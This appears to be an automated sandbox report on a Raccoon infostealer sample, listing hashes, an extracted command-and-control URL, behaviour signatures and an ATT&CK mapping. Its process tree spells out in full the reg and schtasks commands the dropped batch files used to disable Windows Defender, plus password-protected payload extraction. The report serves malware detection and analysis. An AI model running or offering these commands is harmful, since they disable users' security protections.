Analysis

  • max time kernel
    4294180s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    27-03-2022 21:41

General

  • Target

    772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.exe

  • Size

    16.3MB

  • MD5

    8135256b8e3ca77140afa18a9c58a4b7

  • SHA1

    188b0b51502a8f59eeca6c3d04492e65b674684c

  • SHA256

    772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4

  • SHA512

    9306bebca31e7767456c25fd914e57f2c07278858b31848a295c940f0f69f872c2323e260c91a05fca0bdda881f9af4ca5f328a3647654afee8d585eefc3548d

Malware Config

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 2 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 4 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 28 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 43 IoCs
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.exe
    "C:\Users\Admin\AppData\Local\Temp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:576
    • C:\Users\Admin\AppData\Local\Temp\is-S6O90.tmp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-S6O90.tmp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.tmp" /SL5="$D0150,16402716,778240,C:\Users\Admin\AppData\Local\Temp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\60sKjNzt\MMF.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\60sKjNzt\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1272
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:1492
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:1524
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:1456
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:1936
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:1180
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:1592
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:1604
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:1620
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:2008
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1460
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:2016
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:1492
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:1528
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:1456
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:948
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:1596
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:1880
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                              • Loads dropped DLL
                                              PID:972
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              5⤵
                                                PID:664
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                5⤵
                                                  PID:608
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:432
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                  5⤵
                                                    PID:828
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                    5⤵
                                                      PID:552
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1668
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                      5⤵
                                                        PID:1748
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                        5⤵
                                                          PID:1468
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                          5⤵
                                                            PID:924
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1380
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                            5⤵
                                                              PID:844
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                              5⤵
                                                              • Modifies security service
                                                              PID:556
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                              5⤵
                                                                PID:1456
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:888
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ""C:\ProgramData\60sKjNzt\main.bat" "
                                                              4⤵
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:972
                                                              • C:\Windows\SysWOW64\mode.com
                                                                mode 65,10
                                                                5⤵
                                                                  PID:1520
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e file.zip -p___________19816pwd19263pwd24022___________ -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:468
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e extracted/file_5.zip -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1728
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e extracted/file_4.zip -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2000
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e extracted/file_2.zip -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1524
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e extracted/file_3.zip -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1920
                                                                • C:\ProgramData\60sKjNzt\7z.exe
                                                                  7z.exe e extracted/file_1.zip -oextracted
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1740
                                                                • C:\ProgramData\60sKjNzt\wxmhost.exe
                                                                  "wxmhost.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:740
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\ProgramData\60sKjNzt\DiskRemoval.bat" "
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1176
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /T 60 /NOBREAK
                                                                  5⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:1452
                                                            • C:\Program Files (x86)\avastvpn.exe
                                                              "C:\Program Files (x86)\avastvpn.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1680
                                                              • C:\Users\Admin\AppData\Local\Temp\is-PV9M9.tmp\avastvpn.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-PV9M9.tmp\avastvpn.tmp" /SL5="$101BA,8012383,778240,C:\Program Files (x86)\avastvpn.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:1816
                                                                • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                  "C:\Program Files (x86)\avast_secureline_setup.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Writes to the Master Boot Record (MBR)
                                                                  • Modifies system certificate store
                                                                  PID:840
                                                                  • C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\common\icarus.exe
                                                                    C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\common\icarus.exe /icarus-info-path:C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\icarus-info.xml /install
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Writes to the Master Boot Record (MBR)
                                                                    • Checks processor information in registry
                                                                    PID:1728
                                                                    • C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\common\icarus_ui.exe
                                                                      C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\common\icarus_ui.exe /er_master:master_ep_db60fd59-b67f-42cc-bd7a-f2a15b5fcb44 /er_ui:ui_ep_ba71de2d-5dc4-4804-b0b7-5d9b31ca038f
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Checks processor information in registry
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:1940
                                                                    • C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\avast-vpn\icarus.exe
                                                                      C:\Windows\Temp\asw-9076bfea-75e6-44a8-bc38-57ec87211e23\avast-vpn\icarus.exe /er_master:master_ep_db60fd59-b67f-42cc-bd7a-f2a15b5fcb44 /er_ui:ui_ep_ba71de2d-5dc4-4804-b0b7-5d9b31ca038f /er_slave:avast-vpn_slave_ep_6ad504a1-01bd-47cf-add4-9a3c63962457 /slave:avast-vpn
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Writes to the Master Boot Record (MBR)
                                                                      • Checks processor information in registry
                                                                      PID:1700
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\xOUvu\MMF.vbs"
                                                                  5⤵
                                                                    PID:1576
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\ProgramData\xOUvu\DisableOAVProtection.bat" "
                                                                      6⤵
                                                                        PID:420
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                          7⤵
                                                                            PID:576
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                            7⤵
                                                                              PID:1836
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                              7⤵
                                                                                PID:1572
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                7⤵
                                                                                  PID:1160
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                  7⤵
                                                                                    PID:1016
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                    7⤵
                                                                                      PID:596
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                      7⤵
                                                                                        PID:2008
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                        7⤵
                                                                                          PID:1492
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                          7⤵
                                                                                            PID:948
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                            7⤵
                                                                                              PID:1424
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                              7⤵
                                                                                                PID:1600
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                7⤵
                                                                                                  PID:672
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                  7⤵
                                                                                                    PID:1204
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                    7⤵
                                                                                                      PID:1724
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                      7⤵
                                                                                                        PID:856
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                        7⤵
                                                                                                          PID:672
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                                          7⤵
                                                                                                            PID:1016
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                            7⤵
                                                                                                              PID:1380
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                              7⤵
                                                                                                                PID:964
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                7⤵
                                                                                                                  PID:1160
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                                                  7⤵
                                                                                                                    PID:1492
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                                                    7⤵
                                                                                                                      PID:944
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                      7⤵
                                                                                                                        PID:2012
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                        7⤵
                                                                                                                          PID:2028
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                                                          7⤵
                                                                                                                            PID:912
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                            7⤵
                                                                                                                              PID:1684
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                              7⤵
                                                                                                                                PID:1908
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                7⤵
                                                                                                                                  PID:1900
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  7⤵
                                                                                                                                  • Modifies security service
                                                                                                                                  PID:1460
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  7⤵
                                                                                                                                    PID:664
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    7⤵
                                                                                                                                      PID:1880
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1996
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c ""C:\ProgramData\xOUvu\main.bat" "
                                                                                                                                    6⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:1828
                                                                                                                                    • C:\Windows\SysWOW64\mode.com
                                                                                                                                      mode 65,10
                                                                                                                                      7⤵
                                                                                                                                        PID:968
                                                                                                                                      • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                        7z.exe e file.zip -p___________12659pwd5006pwd7116___________ -oextracted
                                                                                                                                        7⤵
                                                                                                                                          PID:1996
                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                          7⤵
                                                                                                                                            PID:1364
                                                                                                                                          • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                            7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                            7⤵
                                                                                                                                              PID:1668
                                                                                                                                            • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                              7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                              7⤵
                                                                                                                                                PID:888
                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                7⤵
                                                                                                                                                  PID:1380
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:892
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:1424
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:1364
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:884
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:948
                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                  7⤵
                                                                                                                                                    PID:432
                                                                                                                                                  • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                    "SgrmClientApi.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:1568
                                                                                                                                                    • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                      "SgrmClientApi.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:952
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 184
                                                                                                                                                        9⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:1452
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2004
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c ""C:\ProgramData\xOUvu\DiskRemoval.bat" "
                                                                                                                                                  6⤵
                                                                                                                                                    PID:812
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /T 60 /NOBREAK
                                                                                                                                                      7⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:1528

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                        Persistence

                                                                                                                                        Modify Existing Service

                                                                                                                                        2
                                                                                                                                        T1031

                                                                                                                                        Bootkit

                                                                                                                                        1
                                                                                                                                        T1067

                                                                                                                                        Defense Evasion

                                                                                                                                        Modify Registry

                                                                                                                                        3
                                                                                                                                        T1112

                                                                                                                                        Disabling Security Tools

                                                                                                                                        1
                                                                                                                                        T1089

                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                        1
                                                                                                                                        T1497

                                                                                                                                        Install Root Certificate

                                                                                                                                        1
                                                                                                                                        T1130

                                                                                                                                        Discovery

                                                                                                                                        Query Registry

                                                                                                                                        3
                                                                                                                                        T1012

                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                        1
                                                                                                                                        T1497

                                                                                                                                        System Information Discovery

                                                                                                                                        4
                                                                                                                                        T1082

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

